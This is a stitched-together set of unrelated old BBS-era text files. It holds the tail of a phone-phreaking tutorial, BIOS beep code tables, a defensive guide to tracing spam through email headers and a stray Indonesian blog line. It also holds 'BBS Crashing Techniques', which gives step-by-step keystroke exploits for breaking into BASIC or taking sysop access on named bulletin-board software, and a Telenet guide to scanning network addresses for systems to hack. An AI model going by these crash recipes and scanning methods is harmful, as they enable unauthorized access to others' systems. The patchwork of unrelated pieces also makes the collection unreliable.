beauties can give you the number for an unlisted phone number (the number),
they have all kinds of access. This topic is discussed later in this tutorial.

INTERCEPT OPERATOR:

All places have their share of low lifes, well this is the scum, bottom of the
barrel of operators. She's the one you get when all the recordings are busy
(lower than a recording). Infact these dames can cause you more pains then a
recording. They only know a handful of english (around two sentences) and can
barely even say those. Even though they have no clue to what a trace is,
unless you know their native tongue, and then doubtfully, their just a pain in
the butt to deal with.

OTHER OPERATORS:

Well we have - marine verify, mobile, route and rate, ship to shore,
conference and a few other specific ones. No real help to us now.

*NOTES: Most operators have their own little Directory Assistance. If any
operator is giving you probs ask to speak with his/her/its supervisor. This
will freak them out. In rare loveable cases you might find a nice operator
with a number like (503-123-4567). Whenever you find a 0 or 1 in the 4th
number slot then you know need a Blue Box. It'll give you special access to
those hard to get wenches.




=-=-=-=-=-=-=-=
AREA CODES ETC.
=-=-=-=-=-=-=-=

HOW PHONE NUMBERS WORK:

Basiclly MA made our phone numbers quite simple. Here's how they work:

[A] The area code is what the call a three digit number plan area or NPA. This
means that an area code is just that, the code for an area.

[B] The rest of our number (ie. 666-7209) is divided into two segments. The
first being the Central Office number (666 would be N. Portland) and the
ending (7209) is the station number, or basically your assigned home number.

This complete combination (503-666-7209) is known as the destination code.
Here's how MA has developed the combo's:

[NPA] [TELEPHONE NUMBER]

X*Y XYY-YYYY

X = a number from 2-9
y = a number from 0-9
* = either 0 or 1

Normally an area code may never cross a states boundry, thus an area code
(NPA) may not be used for both New York and for Pennsylvania. However, as for
all other rules there is an exception. Here they are.

SPECIAL AREA CODES:
(SACS)

510 - TWX (USA)
610 - TWX (CANADA)
700 - NEW SERVICE
710 - TWX (USA)
800 - WATTS LINES
810 - TWX (USA)
900 - DIAL-IT SERVICES
910 - TWX (USA)

The explanations of these are as follows:

TWX:

Telex II, as you can see above there are 5 TWX machines. They are all owned by
Western Union. Normally these babes may only be accessed by other TWX
machines, however, if you do not wish to go and purchase one you can access
them by use of the Easylink, by Western Union. For more on this I would
suggest reading The Bioc Agents, and Tucs article on 'Hacking Western Union's
Easylink.'

700:

This is a new service for employees of AT&T in which someone (one of the
special employees) can call his own 700 number (say 700-292-9876), enters
his/her code, and where he is staying and then hangs up. If there is any new
info on the case he is working on, the computer will call him back and tell
him all the latest updates.

800:

There are basically two types of Watts Lines, Inward Watts and Outward watts.
These are probably some of the nicest of the special area codes since they
allow you to call for free. Here's an explanation of the two:

INWARD WATTS:

Inward Wide Area Telecommunications Service is probably the one your most
familiar with. MA has developed it so there are 6 different levels of Inwatts.
Level 6 being the whole U.S. (all 50 states) level 5 being all 48 contienental
states etc. all the way down to 1, only one state. Usually a company will get
a level 6 and then a level 1 because all though level 6 allows you to call
from anywhere in the U.S. it excludes the state where the call is terminated
at, so the company usually buys a level 1 for that state.

Interstate Inwatts are less common but still exist. These are the ones you can
only call from say one state. You can tell one quite easily for they all have
a 2 for the last central office number, or the 6th number (ie. 800-XY2-XXXX).

All companies that have an 800# must have at least two lines. This is because
if you call the first number (ie. 800-666-0190) and it rings busy the 800#
number will always go to another port to see if its busy. Inwatts customers
are billed by the hour instead of month like us.

OUTWARD WATTS:

Outwatts are just that, there for making outward calls only. Large companies
commonly use Outwatts since they recieve bulk discounts. Outwatt 800's are in
the form of:

800-*XX-XXXX

* may only be a 0 or 1 and can only be reached by way of box. The whole set,
*XX is the areas that are accessable by that comany.

900:

This is a nation number used for taking polls and the like (How do you think
they know what shows on the tube are k00l). The number for this service is,
900-555-1212. This will tell whats up on the system. Beware, this MA trick
will cost you 50 cents a minute, and 35 cents there after (ever heard of MA
being cheap?).

=-=-=-=-=
CO CODES
=-=-=-=-=

These are the way the switching office knows where to route the call. The
following codes are reserved nationwide:

555 - directory assistance
950 - future use
958 - plant test
959 - plant test
976 - dial-it services (weather etc.)

950:

This includes all special service. Heres a list of a few:

1000 - SPC
1022 - MCI Execunet
1033 - US Telephone
1044 - Allnet
1088 - SBS Skyline

*NOTE: These beauts are free from fortresses.

958,959:

These consist of ANI, Ringback and some other MA tests.

976:

Check this one out. Simply dial 976-1000. Alot of BBSs around will probably
have a more complete listing of these services.

=-=-=-=-=
N11 CODES:
=-=-=-=-=

I'm not sure which one of these are still in service. Basically MA wants to
dump these services, but alot are still in use, it'll vary with your area.

011 - international dialing prefix
211 - coin refund operator
411 - directory assistance
611 - repair service
811 - business office
911 - EMERGENCY

Downloaded From P-80 Systems 304-744-2253

Beep Codes Error Codes

After repeated requests for beep codes i have decided to post them here maybe they could be pinned

Standard Original IBM POST Error Codes
Code Description

1 short beep System is OK
2 short beeps POST Error - error code shown on screen No beep Power supply or system board problem Continuous beep Power supply, system board, or keyboard problem Repeating short beeps Power supply or system board problem
1 long, 1 short beep System board problem
1 long, 2 short beeps Display adapter problem (MDA, CGA)
1 long, 3 short beeps Display adapter problem (EGA)
3 long beeps 3270 keyboard card
IBM POST Diagnostic Code Descriptions
Code Description
100 - 199 System Board
200 - 299 Memory
300 - 399 Keyboard
400 - 499 Monochrome Display
500 - 599 Colour/Graphics Display
600 - 699 Floppy-disk drive and/or Adapter
700 - 799 Math Coprocessor
900 - 999 Parallel Printer Port
1000 - 1099 Alternate Printer Adapter
1100 - 1299 Asynchronous Communication Device, Adapter, or Port
1300 - 1399 Game Port
1400 - 1499 Colour/Graphics Printer
1500 - 1599 Synchronous Communication Device, Adapter, or Port
1700 - 1799 Hard Drive and/or Adapter
1800 - 1899 Expansion Unit (XT)
2000 - 2199 Bisynchronous Communication Adapter
2400 - 2599 EGA system-board Video (MCA)
3000 - 3199 LAN Adapter
4800 - 4999 Internal Modem
7000 - 7099 Phoenix BIOS Chips
7300 - 7399 3.5" Disk Drive
8900 - 8999 MIDI Adapter
11200 - 11299 SCSI Adapter
21000 - 21099 SCSI Fixed Disk and Controller
21500 - 21599 SCSI CD-ROM System

AMI BIOS Beep Codes
Code Description

1 Short Beep System OK
2 Short Beeps Parity error in the first 64 KB of memory
3 Short Beeps Memory failure in the first 64 KB
4 Short Beeps Memory failure in the first 64 KB Operational of memory
or Timer 1 on the motherboard is not functioning
5 Short Beeps The CPU on the motherboard generated an error
6 Short Beeps The keyboard controller may be bad. The BIOS cannot switch to protected mode
7 Short Beeps The CPU generated an exception interrupt
8 Short Beeps The system video adapter is either missing, or its memory is faulty
9 Short Beeps The ROM checksum value does not match the value encoded in the BIOS
10 Short Beeps The shutdown register for CMOS RAM failed
11 Short Beeps The external cache is faulty
1 Long, 3 Short Beeps Memory Problems
1 Long, 8 Short Beeps Video Card Problems

Phoenix BIOS Beep Codes
Note - Phoenix BIOS emits three sets of beeps, separated by a brief pause.

Code Description
1-1-3 CMOS read/write failure
1-1-4 ROM BIOS checksum error
1-2-1 Programmable interval timer failure
1-2-2 DMA initialisation failure
1-2-3 DMA page register read/write failure
1-3-1 RAM refresh verification failure
1-3-3 First 64k RAM chip or data line failure
1-3-4 First 64k RAM odd/even logic failure
1-4-1 Address line failure first 64k RAM
1-4-2 Parity failure first 64k RAM
2-_-_ Faulty Memory
3-1-_ Faulty Motherboard
3-2-4 Keyboard controller Test failure
3-3-4 Screen initialisation failure
3-4-1 Screen retrace test failure
3-4-2 Search for video ROM in progress
4-2-1 Timer tick interrupt in progress or failure
4-2-2 Shutdown test in progress or failure
4-2-3 Gate A20 failure
4-2-4 Unexpected interrupt in protected mode
4-3-1 RAM test in progress or failure>ffffh
4-3-2 Faulty Motherboard
4-3-3 Interval timer channel 2 test or failure
4-3-4 Time of Day clock test failure
4-4-1 Serial port test or failure
4-4-2 Parallel port test or failure
4-4-3 Math coprocessor test or failure
Low 1-1-2 System Board select failure
Low 1-1-3 Extended CMOS RAM failure

Beep Code Manual

Beep Code Manual, Better Than Gold Techies, American Megatrends Int. & Phoenix

(I'm IT, I use these codes to trouble shoot hardware issues at my job. Enjoy) cold.gif

BIOS Beep Codes

When a computer is first turned on, or rebooted, its BIOS performs a power-on self test (POST) to test the system's hardware, checking to make sure that all of the system's hardware components are working properly. Under normal circumstances, the POST will display an error message; however, if the BIOS detects an error before it can access the video card, or if there is a problem with the video card, it will produce a series of beeps, and the pattern of the beeps indicates what kind of problem the BIOS has detected.
Because there are many brands of BIOS, there are no standard beep codes for every BIOS.

The two most-used brands are AMI (American Megatrends International) and Phoenix.

Below are listed the beep codes for AMI systems, and here are the beep codes for Phoenix systems.


AMI Beep Codes

Beep Code Meaning
1 beep DRAM refresh failure. There is a problem in the system memory or the motherboard.
2 beeps Memory parity error. The parity circuit is not working properly.
3 beeps Base 64K RAM failure. There is a problem with the first 64K of system memory.
4 beeps System timer not operational. There is problem with the timer(s) that control functions on the motherboard.
5 beeps Processor failure. The system CPU has failed.
6 beeps Gate A20/keyboard controller failure. The keyboard IC controller has failed, preventing gate A20 from switching the processor to protect mode.
7 beeps Virtual mode exception error.
8 beeps Video memory error. The BIOS cannot write to the frame buffer memory on the video card.
9 beeps ROM checksum error. The BIOS ROM chip on the motherboard is likely faulty.
10 beeps CMOS checksum error. Something on the motherboard is causing an error when trying to interact with the CMOS.
11 beeps Bad cache memory. An error in the level 2 cache memory.
1 long beep, 2 short Failure in the video system.
1 long beep, 3 short A failure has been detected in memory above 64K.
1 long beep, 8 short Display test failure.
Continuous beeping A problem with the memory or video.
BIOS Beep Codes


Phoenix Beep Codes

Phoenix uses sequences of beeps to indicate problems. The "-" between each number below indicates a pause between each beep sequence. For example, 1-2-3 indicates one beep, followed by a pause and two beeps, followed by a pause and three beeps. Phoenix version before 4.x use 3-beep codes, while Phoenix versions starting with 4.x use 4-beep codes. Click here for AMI BIOS beep codes.
4-Beep Codes
Beep Code Meaning
1-1-1-3 Faulty CPU/motherboard. Verify real mode.
1-1-2-1 Faulty CPU/motherboard.
1-1-2-3 Faulty motherboard or one of its components.
1-1-3-1 Faulty motherboard or one of its components. Initialize chipset registers with initial POST values.
1-1-3-2 Faulty motherboard or one of its components.
1-1-3-3 Faulty motherboard or one of its components. Initialize CPU registers.
1-1-3-2
1-1-3-3
1-1-3-4 Failure in the first 64K of memory.
1-1-4-1 Level 2 cache error.
1-1-4-3 I/O port error.
1-2-1-1 Power management error.
1-2-1-2
1-2-1-3 Faulty motherboard or one of its components.
1-2-2-1 Keyboard controller failure.
1-2-2-3 BIOS ROM error.
1-2-3-1 System timer error.
1-2-3-3 DMA error.
1-2-4-1 IRQ controller error.
1-3-1-1 DRAM refresh error.
1-3-1-3 A20 gate failure.
1-3-2-1 Faulty motherboard or one of its components.
1-3-3-1 Extended memory error.
1-3-3-3
1-3-4-1
1-3-4-3 Error in first 1MB of system memory.
1-4-1-3
1-4-2-4 CPU error.
1-4-3-1
2-1-4-1 BIOS ROM shadow error.
1-4-3-2
1-4-3-3 Level 2 cache error.
1-4-4-1
1-4-4-2
2-1-1-1 Faulty motherboard or one of its components.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4
2-1-3-2 I/O port failure.
2-1-3-1
2-1-3-3 Video system failure.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4 I/O port failure.
2-1-4-3
2-2-1-1 Video card failure.
2-2-1-3
2-2-2-1
2-2-2-3 Keyboard controller failure.
2-2-3-1 IRQ error.
2-2-4-1 Error in first 1MB of system memory.
2-3-1-1
2-3-3-3 Extended memory failure.
2-3-2-1 Faulty motherboard or one of its components.
2-3-2-3
2-3-3-1 Level 2 cache error.
2-3-4-1
2-3-4-3 Motherboard or video card failure.
2-3-4-1
2-3-4-3
2-4-1-1 Motherboard or video card failure.
2-4-1-3 Faulty motherboard or one of its components.
2-4-2-1 RTC error.
2-4-2-3 Keyboard controller error.
2-4-4-1 IRQ error.
3-1-1-1
3-1-1-3
3-1-2-1
3-1-2-3 I/O port error.
3-1-3-1
3-1-3-3 Faulty motherboard or one of its components.
3-1-4-1
3-2-1-1
3-2-1-2 Floppy drive or hard drive failure.
3-2-1-3 Faulty motherboard or one of its components.
3-2-2-1 Keyboard controller error.
3-2-2-3
3-2-3-1
3-2-4-1 Faulty motherboard or one of its components.
3-2-4-3 IRQ error.
3-3-1-1 RTC error.
3-3-1-3 Key lock error.
3-3-3-3 Faulty motherboard or one of its components.
3-3-3-3
3-3-4-1
3-3-4-3
3-4-1-1
3-4-1-3
3-4-2-1
3-4-2-3
3-4-3-1
3-4-4-1
3-4-4-4 Faulty motherboard or one of its components.
4-1-1-1 Floppy drive or hard drive failure.
4-2-1-1
4-2-1-3
4-2-2-1 IRQ failure.
4-2-2-3
4-2-3-1
4-2-3-3
4-2-4-1 Faulty motherboard or one of its components.
4-2-4-3 Keyboard controller error.
4-3-1-3
4-3-1-4
4-3-2-1
4-3-2-2
4-3-3-1
4-3-4-1
4-3-4-3 Faulty motherboard or one of its components.
4-3-3-2
4-3-3-4 IRQ failure.
4-3-3-3
4-3-4-2 Floppy drive or hard drive failure.
3-Beep Codes
Beep Code Meaning
1-1-2 Faulty CPU/motherboard.
1-1-3 Faulty motherboard/CMOS read-write failure.
1-1-4 Faulty BIOS/BIOS ROM checksum error.
1-2-1 System timer not operational. There is a problem with the timer(s) that control functions on the motherboard.
1-2-2
1-2-3 Faulty motherboard/DMA failure.
1-3-1 Memory refresh failure.
1-3-2
1-3-3
1-3-4 Failure in the first 64K of memory.
1-4-1 Address line failure.
1-4-2 Parity RAM failure.
1-4-3 Timer failure.
1-4-4 NMI port failure.
2-_-_ Any combination of beeps after 2 indicates a failure in the first 64K of memory.
3-1-1 Master DMA failure.
3-1-2 Slave DMA failure.
3-1-3
3-1-4 Interrupt controller failure.
3-2-4 Keyboard controller failure.
3-3-1
3-3-2 CMOS error.
3-3-4 Video card failure.
3-4-1 Video card failure.
4-2-1 Timer failure.
4-2-2 CMOS shutdown failure.
4-2-3 Gate A20 failure.
4-2-4 Unexpected interrupt in protected mode.
4-3-1 RAM test failure.
4-3-3 Timer failure.
4-3-4 Time of day clock failure.
4-4-1 Serial port failure.
4-4-2 Parallel port failure.
4-4-3 Math coprocessor.

BBS CRASHING TECHNIQUES

[:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:]
[:=:] [:=:]
[:=:] New Wave presents... [:=:]
[:=:] [:=:]
[:=:] [:=:]
[:=:] BBS CRASHING TECHNIQUES [:=:]
[:=:] ------------------------- [:=:]
[:=:] [:=:]
[:=:] by Mr. Memorex 1/27/02 [:=:]
[:=:] [:=:]
[:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:]

- File Formatted for 80 columns like it or not -

To start off with, I'd just like to say this file is a collectithe
latest BBS crashes. Many people have grudges and reasons to 'crash' a bbs,
well this file is served as an aid to them and also to sysops who want to
prevent their own bbs' from being attacked. And that's enuff talk for now,
let's get on with the good stuff (everything is in cookbook format for speedy
reading).


[-=: Apple Net :=-]


1. Post a message (can be bbs,feedback,newuser etc.)
2. Press space bar util you get to the very last line (40th col.)
3. type ctrl-D
4. (after the word wrap to next line) Type any dos command (Preferrably FP)
5. get into editor ('/E')
6. list the program
7. You should be in basic or executing whatever dos command you entered


Requirements:

- Must have wordwrap activated
- 40 columns mode should be activated
- Their must be a (L)ist command in the editor


[-=: Telecat 2.x & 3.0 :=-]


2.x
-----


1. Go to the board section
2. Newscan the last board accessable
3. After the first message, type 'B' at the prompt (To jump to next board)


Results:

- If it was the last board on the bbs, chances arethat will break into Basic
- If not, then it will go on to the next board (which is handy and surpassess
the security level crap)

3.0
-----


1. Post Message
2. Type a line of text
3. type ctrl-V


Results:

- This should either hang the system or break into basic
- It is trying to center the line but it fucks up

[-=: GBBS Pro :=-]

Method 1:

1. Go the the editor
2. Hold down tab key
3. or press space and type ctrl-C

Method 2:

1. Upload to a full volume

Method 3:

1. read the userlist
2. hang up when it gets to the Sysop
3. call back and log on and you'll be a sysop

[-=: Proving Grounds :=-]

Method 1:

1. (On older versions) Enter decimal or negative numbers

Method 2:

1. Call board and enter the user number of a Remote sysop
2. Enter any bs for a pw
3. Do the same thing again (more garbage the 2nd time it asks)
4. Now enter your real number and pass
5. At the first input prompt type 'Remote'
6. This should give you the Remote Sysop menu and access

Notes:

- Using Sysop's user# will give you 10 extra minutes on system
- The second method works only on unmoded newer versions of Proving Grounds

Ok, well that about wraps it up. Remember, all these crashes work only on
unmoded boards (which are on the most part run by leeches and geeks).

If you have any questions or more tips for Vol.2 then leave me mail on
Halifax 20megs (301)445/5897 or Eastern Alliance 10megs (201)327/5725
and where else you see me. Both are fine boards. Have Fun!

[---------------------------]
Mistywood BBS/AE/CF........818/335-5651
Mistywood // BBS...........602/220-9363
The Wizards Guild..........409/696-8226
Den o/Crude Tort...........617/832-9229
Sirius Cybernetics.........808/528-2436
[-------------------------------------]


DOWNLOADED FROM P-80 SYSTEMS.....

Basic Networking


11/20/89 -----------------------------
7:30 EST-10:46Est - A File By Sk8 The SkinHead-
-----------------------------


BASIC NETWORKING

Well, many people have asked me "how do i use Telenet".."how do i use an outdial". Well i have decided to write a very basic file on telenet and how to get around on the networks.

Well Telenet and others are PSN's or (Packet Switching Networks) these nets are connected to many other networks around the world. You can do alot with just basic knowledge that i have (most of you will know this and way beyond what i know but some will benefit from it) i will start with some of the terms that are often used with these services.

Access Number- The direct number that you dial to access a network (duh).

Nua (Network Users Address) - An Nua is basicly a number you type in to access that particular service think of an Nua as a phone number sorta its not an actually phone number with an Acn country code or whatever because the service is connected to the network world wide. I hope that was fairly clear let me show this think of the planet earth as an network and to reach the services on the planet you call the phone number like the service is a persons residence or business phone or payphone whatever just like on a network an Nua is the Address to a system or outdial whatever on the particular network. I hope this is clear or atleast somewhat understood.

Nui (Network User Identification) - An Nui is like a Account and Password to the network like an account and password is to a bbs that lets you access the system. Some people use Nui for like anything like an Vax system Unix systems they are referring to an Nui as basicly a account on the particular system that lets you use the system.

DNIC (Data Network Identification Code) - The DNIC is like a 4 digit code that represents what Psn it is think of an DNIC like an AreaCode and the Nua the individual phone number.

Outdial - Is basicly what it says an modem port connected somewhere on the network that will allow you to dial out from and connect data only to a actually phone number not an Nua.

Pad (Packet Assemble Disassembler) - an x.25 pad is very useful an pad using x.25. protocal transmits at 9600 bps to an Nua. This may sound funny but i call them "Launch Pads" heh like with an x.25 you can usally access any Nua on the planet by usally typing the Dnic+Nua.



Now i will explain various things and give helpful ideas.



Let me start off with some helpful things for you to try and do.

TeleNet


The first thing your going to have to have is your Access number it is very easy to get your local access number. Simply call telenet at 1-800-TELENET that is thier customer service number and ask for your dialup the operator will ask for your area code and prefix of your phone number he/she will also ask your baud rate. There are many telenet ports across the country and internationly with varying baud rates from 110 bps (yuck) to 9600 (i wish i had) so you will want your maximum baud port most locations have atleast 1200 many have 2400 and not alot have 9600 ports like for big cities like Detroit and Los Angeles at the end of the file i will list some useful numbers.
Some things to do while online with Telenet and Tymnet. While at the @ on the Telenet system type "mail" or "C mail" or "telemail" or even "c telemail" this access's telenets mail system simple entitled "Telemail" from there it will ask "user name" or something like that type "phones" next it will prompt you "password" enter "phones". The phones service has alot of worthy information it will give you a menu to choose from the rest should be self explanatory. Along with the other information on the phones service there is a complete updated list of all Telenet access numbers which is conveinent. Once you have tried the phones service also on telemail enter "Intl/Associates" as the user name and "Intl" for the international access numbers. If you are calling from overseas somewhere connect with an telenet access number then type this Nua at the telenet @ prompt "311020200142" and enter the username and password.
You might want to pick up a sort of a reference booklet on Telenet simply again call the customer service number and ask them for "How to use Telenet's Asychronus Dial Service" and give them your address which is self explanatory.
Another tidbit of info you would like to know if you already didnt know that Telenet is owned by Us Sprint long distance service.




Tymnet

The same goes for Tymnet service you will first need an Access Number. Simply call Tymnet customer service at 1-800-872-7654 and ask them. Again you might like to get Tymnets reference booklet on how to use there system simply again ask them to send it to you. Once online with a Tymnet access number type "Information" at the user name prompt and you will be connected to another nice thing on tymnet which you have access to all thier Access Numbers also just like the "phones" service on Telenet. Tymnet is owned by "Mcdowell Douglas" corporation. Unlike Telenet where a long distance company owns the network. On Tymnet in the "Information" service there is a very cool option that will provide you with all the Dnic's (Networks) available from Tymnet. You may also want to get that on buffer but for your conveinience i will include a copy of that. The file "Basic.NetworksII" is the complete listing and i would like the Basic.NetworksII file to be accompanied by this file for the most part.



Outdials

Now i will discuss Outdials and tell how to use them. An Outdial on Telenet is an Pcp Port usally. It will enable you to connect data with a carrier. An Outdial is a modem connected up to the network to access the outdial spimply type the outdials Nua. Usally you will need a Nui or Pad to use an Outdial on Telenet just to let you know. Once connected to an Outdial on Telenet type "Ctrl-e" to get into the command mode of the Outdial or if your sharp on your Hayes modem AT command set just issue the commands thru the Outdial besure to type "Atz" when logged in to reset the modem parameters to default values. Outdials range from different baud rates just like what kind of modem is hooked into the Outdial port. This is the basic Telenet Outdial but there are many types a Tymnet Asychronus is a very good Outdial to use like i said there are many different types the above is for Telenet Pcp Outdials which are used most widely.


Scanning Telenet


Well now i will explain how to scan telenet and how to find Pcp outdials etc. When scanning telenet call your Access Number and at the prompt enter the Nua. Plan to scan a certain amount of Nua's in a session wether the number is up to you, usally when i scan i scan in blocks of 100 you can find alot of things while scanning. I will tell how to find pcp outdials, first if your looking for a particular area code for the outdial take the 313 area code for example usally an outdial is in the first 150 numbers scanned so i would suggest if scanning for outdials scan like this..the area code for which you want the outdial two 0's then a three digit number so the scan would look like this...31300001,31300002,31300003 etc.. im sure you get it...along the way you will probably find other neat things. Some things to know when scanning telenet is when you enter an Nua and it freezes like wont do anything send a break signal, for me i use Proterm for the Apple the break signal is open-apple b once the break signal is sent it should go back to a @ prompt again. If you try scanning another nua directly after you broke out from the frozen portion Telenet will give you an error message "Connection Pending" which means it is still looking for the Nua system from which you requested previously. To remedy this situation after the break signal is sent type "d" for disconnect it will then tell you the connection has been terminated. Proceed scanning the Nua continuing where you left off. (Note. you will get the freeze and have to repeat the sequence over and over again as of there are A LOT of Nuas that freeze) Well i bet your asking "how do i know when ive found an outdial?" usally Telenet will respond with a connect message and then nothing try to type "Atz" if it responds "ok" then you have a Outdial port where as Atz is the hayes modem command for reseting the modems paramaters to default settings. Ok now i will explain some things to look for and some wise things to do while scanning and also supply an response key explanations.
Whenever you "Connected" to an Nua write it down no matter what it is make notes of what you find and label them for instance if you encounter any of these messages.

User Name = a Vax System
Login = a Unix system
Primenet = a prime system
Password = something worth noting

Basicly anything that connects take note of this is very useful for finding systems to hack on even though most or all of Telenet has been scanned at one time or another there are always somethings to do! that is a FACT! Be sure to write down all "Refused Collect Connection" also because we must not forget that when we request an Nua that we are asking for a collect call all Nuas inputed on Telenet without an Nui are being paid for by the particlar system requested that is why when an Outdials Nua is requested without any sort of Pad,Nui etc. it will not excecpt the call in all cases i have encountered

Here is a list of Network Messages that Telenet will respond with remember these are for any type of Telenet access the following may appear and a completed explanation.

@ is the network command prompt

? the last entry was invalid

Access Bared - Your connection request does not allow you to connect to this system

Access to This Address not permitted - Your Nui is not authorized to access the address you typed

Attempt Aborted - You enterd the disconnect command (as we said before when it freezes when scanning)

Busy - All the ports,destinations are in use try again later

Collect Wats Call Not Permitted - Collect Wats calls not permitted by your host or authorized by your Nui

Connected - Your terminal has been connected to the Nua system you requested

Connection From - Your terminal has been called by another computer or terminal

Connection Pending - The Network is try to establish a connection with the Nua you requested (enter the d command or "bye" to disconnect the attempt)

Disconnected - Your terminal has been disconnected from the terminal you called

Enhanced Network Services System Error - Your call couldnt be validated contact customer service

Enhanced Network services unavailable at this time - Serivce is temporarily unavailable try again later

Illegal Address - enter the Connect sequence again whether it be an Nua or a system name

Invalid Charge Request - your payment selection is not valid

Invalid User Id or Password - The Nui you entered is not valid

Local Congestion - Your local Access number is busy try again in a couple minutes

Local Disconnect - Your Terminal has been disconnected

Local Network Outage - A temporary problem is preventing you from using the network

Local Procedure Error - Communication problems by the network caused the network to clear your call

Not Available,Not Operating,Not Responding - Your Computer cannot accept your request for connection try later

Not Connected - You have entered a command thai s only valid when connected to a system type "cont" to be brought back into the connection

Not Reachable - A temporary conditon prevents you from using the network

Password - This is the prompt which apprears after youve entered an Nui

*** Possible Data Loss - connecton has been reset

Refused Collect Connection - Your payment selection must be prepaid

Rejecting - Host copmputer refuses to accept the call

Remote Procedure Error - Communication problems forced the network to clear our call

Still Connected - You requested another service while your online to another

Telenet XXX XXX - Network Port you are using

Terminal - This is the terminal type prompt

Unable to validate call - Your Nui has been temporarily disbaled

Unable to validate call contact admin - The Nui has been permently disabled

Unknown Adress - Your Nua may be invalid

Wats Call not permitted - Telenet In-wats calls are not permitted by your host or your Nui


Well that is the end of the Telenet messages and this is the end of our file only left is the numbers i have and some other usual stuff


Telenet Customer service 1-800-TELENET
Tymnet Customer service 1-800-872-7654
Telenet Access # 313/964-2988 1200 bps 313/963-2274 2400 313/964-3133 9600 bps
Tymnet Access# 313/962-2870
Global Outdial at 20200123

Well that is about it id like to greet some people here SoldierOfFortune,Frodo,TheBit,Hellraiser,Icecube,Slaytanic,Corrupt,Lorax,Deadman#The Disk Master,The Hunter,DPAK,MOD,Rat,The Traxster,The Apple Bandit,El Cid,Shadow,Blue Adept,Blacknight,LOD,HALE,DungeonMaster,Blackbeard,Kilroy,The Whole Interchat scene,All my buddys from the alliances,Gambler,Sabers Edge,Misfit,The Flash,Qsd friends,All the people who called my Vmb'z for "Rad Infoz" and helped to keep it going and all the whole people you make a difference "All you Kids out There keep the Faith!"

I can be reached on Funtime Gs at 305-989-0181 d215*guest is the new user pass
I can be reached at this Vmb 313-980-5632
and soon im going to be running a bbs with a friend of mine so be sure to look for that like i said im outta here Slaytze!!!!


Text-Files 2: 

Backtracking EMAIL Messages

Backtracking EMAIL Messages

Tracking email back to its source: Twisted Evil
cause i hate spammers... Evil or Very Mad

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.


Return-Path:

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
for ; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID:

From: "Maricela Paulson"

Reply-To: "Maricela Paulson"

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"


According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.


Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)
12.218.168.0 - 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost
Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com
Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.

hari ke-6

sekarang hari ke-6 ramadhan,
well... kalo anda lihat picture disamping anda akan melihat hari pertama hingga hari ke 5 agustus sebagian tertutupi bintang.
